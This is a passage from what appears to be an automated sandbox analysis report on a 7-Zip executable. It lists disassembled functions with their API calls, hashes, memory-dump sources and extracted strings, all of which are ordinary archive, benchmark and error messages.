                                • Instruction Fuzzy Hash: 1ED0A9B2A02940C0DB212FBA98503682361AB14B30F681311CA784A3D0DF298AE38324
                                Function 0041F3A0 Relevance: 1.3, APIs: 1, Instructions: 13COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 3e155f00f62f0e47eb70742027f4ab7a19f307af7c84af4b08fedca37786f67f
                                • Instruction ID: 533fa4ddfd0ad68a0c00b787f30f84bd0e00389e25b01a26d6ba51d6994c2522
                                • Opcode Fuzzy Hash: 3e155f00f62f0e47eb70742027f4ab7a19f307af7c84af4b08fedca37786f67f
                                • Instruction Fuzzy Hash: 83C012B5A50249838E34B7BB54410941260871D7387241726AD388A3D2E51C89F78A08
                                Function 00467E40 Relevance: 1.3, APIs: 1, Instructions: 13COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00467CC0: free.MSVCRT ref: 00467CE5
                                  • Part of subcall function 00467CC0: free.MSVCRT ref: 00467CEE
                                  • Part of subcall function 00467CC0: free.MSVCRT ref: 00467D21
                                  • Part of subcall function 00467CC0: free.MSVCRT ref: 00467D2E
                                  • Part of subcall function 00467CC0: free.MSVCRT ref: 00467D5A
                                  • Part of subcall function 00467CC0: free.MSVCRT ref: 00467D62
                                  • Part of subcall function 00467CC0: free.MSVCRT ref: 00467D6A
                                  • Part of subcall function 00467CC0: free.MSVCRT ref: 00467D77
                                  • Part of subcall function 00467CC0: free.MSVCRT ref: 00467D80
                                • free.MSVCRT ref: 00467E5A
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: e32e438a77474687ca9c586bf6d33288871a840c7a8afb180b9d7493ede7d58d
                                • Instruction ID: d79c63dbdda77cb4a11a6386b5b716971fad851992bf75cc48f863da1098b088
                                • Opcode Fuzzy Hash: e32e438a77474687ca9c586bf6d33288871a840c7a8afb180b9d7493ede7d58d
                                • Instruction Fuzzy Hash: 24C012A1B5034543CE2866BA58410951250971873C7340B15AD308E392E75DC9D34655

                                Non-executed Functions

                                Function 004587AC Relevance: 608.5, APIs: 323, Strings: 23, Instructions: 2966COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID:
                                • String ID: .001$7-Zip cannot find MAPISendMail function$7zE$GetFullPathName error$It is not allowed to include archive to itself$MAPISendMail$MAPISendMailW$Mapi32.dll$SFX file is not specified$Scanning error$The file already exists$The file is read-only$There is a folder with the name of archive$There is some data block after the end of the archive$Updating for multivolume archives is not implemented$can't find archive$cannot delete the file$cannot find specified SFX module$cannot load Mapi32.dll$cannot move the file$rsfx$stdout$type of archive is not specified
                                • API String ID: 0-3766773286
                                • Opcode ID: ad2ec1326be049bfc3d795eb4e9a599bc85ab757441936f4e3e734a59a687d22
                                • Instruction ID: addafd30a59cfffd5267bde37248ab9fbd2e8e7057422809a59a662a65754ecf
                                • Opcode Fuzzy Hash: ad2ec1326be049bfc3d795eb4e9a599bc85ab757441936f4e3e734a59a687d22
                                • Instruction Fuzzy Hash: F6434232249AC991CA71EB22E4913EFA360F7C5785F804117DE9D97B16DE7CC899CB08
                                Function 00434640 Relevance: 253.3, APIs: 96, Strings: 47, Instructions: 3062COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$ClearCurrentFreeProcessVariantVirtualmemmove
                                • String ID: $ $ $ | $ (Cmplx)$1T CPU Freq (MHz):$@$AES128$AES192$Avg:$Avr:$Benchmark threads: $CPU$CPU hardware threads:$CRC$Compressing$Decompressing$Dict$Dictionary reduced to: $E/U$Effec$KiB/s$LZMA$MB/s$MIPS$Method$R/U$Rating$Size$Speed$T CPU Freq (MHz):$THRD$Tot:$Usage$`3G$crc32$file$file size =$freq$freq=$hash$mts$size: $tic$time$timems$usage:
                                • API String ID: 362377386-2662154150
                                • Opcode ID: cbffe71f11396d2441aeaa4ee77d5453ea28e575480ff31e4bcebebed7b91dcb
                                • Instruction ID: aea7696c40a54e1f2a67511246db11be2c0ecba96ab581ca60953822ffb423b7
                                • Opcode Fuzzy Hash: cbffe71f11396d2441aeaa4ee77d5453ea28e575480ff31e4bcebebed7b91dcb
                                • Instruction Fuzzy Hash: 13438D72209AC596CB30EB26E4943EEB360F789B84F815117DA9E57B19DF3CC585CB08
                                Function 0046469D Relevance: 199.1, APIs: 102, Strings: 11, Instructions: 1325COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputs$free$ErrorExceptionLastThrowfflushfputcmalloc
                                • String ID: : $ is not a file$----------$Archives$Can't allocate required memory$ERROR: $Listing archive: $Path$Total archives size$Volumes$opening :
                                • API String ID: 3292964186-2093788487
                                • Opcode ID: 10ae18cb8811e93d77e843722f0bd3e60a8bc27c85b5066c4ef774a54461b90e
                                • Instruction ID: e4524c7df793526a4477f63f86acdc76e523608386bc5259bfc352d5d3cca887
                                • Opcode Fuzzy Hash: 10ae18cb8811e93d77e843722f0bd3e60a8bc27c85b5066c4ef774a54461b90e
                                • Instruction Fuzzy Hash: C8C2A372209AC592DB30EB26E94039FA361F7C5784F805127DA8D87B29EF7CC595CB09
                                Function 0044541C Relevance: 179.0, APIs: 142, Instructions: 1535stringCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$ClearVariantmemsetstrlen
                                • String ID:
                                • API String ID: 1009013457-0
                                • Opcode ID: 444506f4a55f459f99ef94ab20b9b0c580ca8b2685cba1b5957871551acc8b83
                                • Instruction ID: 6462de92e03107fc05b7eb60a86dd37451cdb0dfb106535f9a6e71a58e5117a9
                                • Opcode Fuzzy Hash: 444506f4a55f459f99ef94ab20b9b0c580ca8b2685cba1b5957871551acc8b83
                                • Instruction Fuzzy Hash: CCD2DA32209AC583DB24EB26E5502AFB760F7C5B84F41411BDB9A87B19DF7CC895CB09
                                Function 004565F0 Relevance: 168.3, APIs: 90, Strings: 5, Instructions: 2031COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: ExceptionThrow
                                • String ID: There are unclosed input file:$bzip2$cannot open SFX module$cannot open file$update operations are not supported for this archive
                                • API String ID: 432778473-1171776569
                                • Opcode ID: 6f2f4f09575be222042283dd36d02bf38819880ec86b67f29336ea02807ce11d
                                • Instruction ID: 11d5989c53f670fae15ad635beb62f0393888bb4028ce9041bcab281d766b270
                                • Opcode Fuzzy Hash: 6f2f4f09575be222042283dd36d02bf38819880ec86b67f29336ea02807ce11d
                                • Instruction Fuzzy Hash: 6A037D36209B8486CB20DF26E49426EB760F789F85F494127DE9E57B19CF7CC899C708
                                Function 00443BBC Relevance: 155.1, APIs: 123, Instructions: 1374COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$ExceptionThrow$memmove$malloc
                                • String ID:
                                • API String ID: 273084669-0
                                • Opcode ID: c06d576b23c1fff093e75f27bc57d7d04bd802aee2322c5613d46219fb7a50b3
                                • Instruction ID: 6686dd3578bdc575624683393b330774f0a725cb31ba37c287f81c557a322718
                                • Opcode Fuzzy Hash: c06d576b23c1fff093e75f27bc57d7d04bd802aee2322c5613d46219fb7a50b3
                                • Instruction Fuzzy Hash: B7C27F32205B8982DB24EF26E0907AEA760FBC5B84F544617AE9E57B15CF7CC855CB08
                                Function 0044F022 Relevance: 126.9, APIs: 83, Strings: 1, Instructions: 903COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$memmove$memset$ExceptionThrow
                                • String ID: Split
                                • API String ID: 2395193269-1882502421
                                • Opcode ID: 9287a54f748d6e4c6dffe80e7311a54b3c31a604ecf39a59f832a6857ed88bf8
                                • Instruction ID: 5affdc812150a094fe22ab4847eadc7eca17d17eaec52cdcd185e91334e881ac
                                • Opcode Fuzzy Hash: 9287a54f748d6e4c6dffe80e7311a54b3c31a604ecf39a59f832a6857ed88bf8
                                • Instruction Fuzzy Hash: 3F726136249AC886DB24DB36E4506AF6760F7C6B88F505027EE4E97B15CF7CC899C708
                                Function 004231C8 Relevance: 79.1, APIs: 39, Strings: 6, Instructions: 312COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$memmove
                                • String ID: Cannot open mapping$Incorrect Map command$Map data error$MapViewOfFile error$Unsupported Map data$Unsupported Map data size
                                • API String ID: 1534225298-1557438135
                                • Opcode ID: 32373e873a27a7a34b06568e3a1b51652a750d874ec9e573c91551283f754d21
                                • Instruction ID: 1d7bee98d772fd3500bb1940662f829306378ad2d6d9046ecacfbcbc41192980
                                • Opcode Fuzzy Hash: 32373e873a27a7a34b06568e3a1b51652a750d874ec9e573c91551283f754d21
                                • Instruction Fuzzy Hash: C2C15D72209A9492CB20EF62F88039EB371F781755F904517EA8E47B64DF7DC999CB08
                                Function 00441984 Relevance: 60.5, APIs: 36, Strings: 4, Instructions: 469COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID: -----$-----BEGIN PGP SIGNED MESSAGE$Hash: $cksum
                                • API String ID: 1294909896-4104380264
                                • Opcode ID: f3afe6078532182b70eaa46acaeec9940f865b54b498929ee495012f9cab3e45
                                • Instruction ID: 26f0dc5b90b619048a73c6c7a0d87a8f64172495dd5b859738870d5fa0364c79
                                • Opcode Fuzzy Hash: f3afe6078532182b70eaa46acaeec9940f865b54b498929ee495012f9cab3e45
                                • Instruction Fuzzy Hash: 8602A5322496C982EB20DB26E5903AE6761F7C1784F505117EF8E57B29DF7CC8A6C708
                                Function 00432F00 Relevance: 56.7, APIs: 37, Instructions: 1174COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: memmove
                                • String ID:
                                • API String ID: 2162964266-0
                                • Opcode ID: bfd1320ea4ce24740018ec00ff737c71ef8aa20b31e7a1721d45ebe3796eebb6
                                • Instruction ID: fce9c662a7027c0acaef1f458875c4822861a83599382b1a124a444af6e40138
                                • Opcode Fuzzy Hash: bfd1320ea4ce24740018ec00ff737c71ef8aa20b31e7a1721d45ebe3796eebb6
                                • Instruction Fuzzy Hash: 07A27F76319A8586DB24DF26E4503AEB360FB89B88F446027DE4E47718EF7DCA45C708
                                Function 00466550 Relevance: 52.7, APIs: 14, Strings: 16, Instructions: 155libraryloadertimeCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: Processfputs$AddressCurrentProc$HandleLibraryLoadModuleTimesmemset
                                • String ID: Cnt:$ Freq (cnt/ptime):$ MCycles$ MHz$GetProcessMemoryInfo$Global $H$K32GetProcessMemoryInfo$Kernel $Physical$Process$Psapi.dll$QueryProcessCycleTime$User $Virtual $kernel32.dll
                                • API String ID: 2354542715-74044351
                                • Opcode ID: 7ac609816afcf9d60d27b409a1bf9934dcc7ebcfea443bc153229e1d8e667799
                                • Instruction ID: 96afcba9c3e7a39a649d35535d373ecf3a7def5e5b539d991857b95ede649ab6
                                • Opcode Fuzzy Hash: 7ac609816afcf9d60d27b409a1bf9934dcc7ebcfea443bc153229e1d8e667799
                                • Instruction Fuzzy Hash: 496183B1709A8582EF20DB56FC447AA6361F788BC4F44402ADE0E83768EF7CC549C708
                                Function 0046328C Relevance: 35.5, APIs: 19, Strings: 1, Instructions: 492stringCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputs$free$memset$strlen$memmove
                                • String ID: data:
                                • API String ID: 527563900-3222861102
                                • Opcode ID: 9b122a4262c8ca6eb71317cad13228cf4fb64ef6b6d076a70265db7928f1266a
                                • Instruction ID: fd6153b02a7381c9122f0cce5305bde7cfa73673de00a66999c69864101f70c4
                                • Opcode Fuzzy Hash: 9b122a4262c8ca6eb71317cad13228cf4fb64ef6b6d076a70265db7928f1266a
                                • Instruction Fuzzy Hash: CB1216B22146C196DB20DF26E4803AFB760F791B89F445017EB8A47765EF7CC949CB0A
                                Function 00431288 Relevance: 28.2, APIs: 22, Instructions: 662COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: c8cadb90f7ad9b778069e74d27780f40bb65b746db65616cbcba84f7f8c7b9c2
                                • Instruction ID: 326166cea1f49b03f08dba5474ff6406e8c517ed3c7988c96a0cc208cde21c23
                                • Opcode Fuzzy Hash: c8cadb90f7ad9b778069e74d27780f40bb65b746db65616cbcba84f7f8c7b9c2
                                • Instruction Fuzzy Hash: 71426F36305A8586DB25EF26E4503ABA361FBC9B88F945127DE4A47B24DF3DC845C708
                                Function 0045F1EC Relevance: 23.3, APIs: 10, Strings: 3, Instructions: 560timeCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • Duplicate filename on disk:, xrefs: 0045F47E
                                • Duplicate filename in archive:, xrefs: 0045FA11
                                • Internal file name collision (file on disk, file in archive):, xrefs: 0045FA25
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$ExceptionThrow$CompareFileTimemallocmemset
                                • String ID: Duplicate filename in archive:$Duplicate filename on disk:$Internal file name collision (file on disk, file in archive):
                                • API String ID: 1338569196-819937569
                                • Opcode ID: 43087eaff4136ca76a9a14ac4a6ba53dd744e40e76c9fe6b62b8b0e00ae9d01a
                                • Instruction ID: 27bddb4985ae324bbdce53f7378e157e72cea849f7ddb0a03a722f2eb75448a9
                                • Opcode Fuzzy Hash: 43087eaff4136ca76a9a14ac4a6ba53dd744e40e76c9fe6b62b8b0e00ae9d01a
                                • Instruction Fuzzy Hash: B522C572614A8486CB30DF26E05026FB7A1F389795F10422BEF9E93B55DB3CD889CB05
                                Function 00417DE8 Relevance: 16.4, APIs: 13, Instructions: 156COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$ErrorLast
                                • String ID:
                                • API String ID: 408039514-0
                                • Opcode ID: 01c4a62813606fd08719907605983b9cbaa1f43fa2eeaca6d268d4cac8914c67
                                • Instruction ID: a42604c74d5b9f632a5cccfb5f0a0b74f29f8f132a3b43a6cbd18303980092ed
                                • Opcode Fuzzy Hash: 01c4a62813606fd08719907605983b9cbaa1f43fa2eeaca6d268d4cac8914c67
                                • Instruction Fuzzy Hash: C251A632218A0492DB10EF25E4513EE6761EBC5794F80121BFB9E43665DF6CC9C6CB18
                                Function 00419414 Relevance: 10.6, APIs: 7, Instructions: 107COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$DriveLogicalStrings
                                • String ID:
                                • API String ID: 837055893-0
                                • Opcode ID: eeccd6f7defde6efc8f0cd495c04816e19d06aaaecd41ca1a7633fb1c1c36bd7
                                • Instruction ID: de8e474b0f137d3e841ce908acb477434f07dce1d1362eded3c977f55618f228
                                • Opcode Fuzzy Hash: eeccd6f7defde6efc8f0cd495c04816e19d06aaaecd41ca1a7633fb1c1c36bd7
                                • Instruction Fuzzy Hash: C431F673301B4596DB21DF36E9602EE6351A784BE8F484226EE5E57385EF3CCD868304
                                Function 0041A720 Relevance: 10.6, APIs: 7, Instructions: 89COMMON
                                Download Yara Rule
                                APIs
                                • free.MSVCRT ref: 0041A745
                                • GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,?), ref: 0041A79C
                                • DeviceIoControl.KERNEL32 ref: 0041A7E5
                                • free.MSVCRT ref: 0041A7F2
                                • free.MSVCRT ref: 0041A80F
                                • memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,?), ref: 0041A83D
                                • free.MSVCRT ref: 0041A846
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$ControlDeviceFileHandleInformationmemmove
                                • String ID:
                                • API String ID: 2572579059-0
                                • Opcode ID: 4066e2ee6e8f9b27f47df988d1a7b28cbd73a81777cb484f9c6dcbb339ab764d
                                • Instruction ID: b7983291e60e372f792c6696e770f6528da1766a99eb5438d4c64d67a9d4d703
                                • Opcode Fuzzy Hash: 4066e2ee6e8f9b27f47df988d1a7b28cbd73a81777cb484f9c6dcbb339ab764d
                                • Instruction Fuzzy Hash: 9731A632246A4089C630AF12F55079EB764E381BD4F584226EBFA47B95DE3DC9E1C704
                                Function 0041BC48 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: AddressDiskFreeHandleModuleProcSpace
                                • String ID: GetDiskFreeSpaceExW$kernel32.dll
                                • API String ID: 1197914913-1127948838
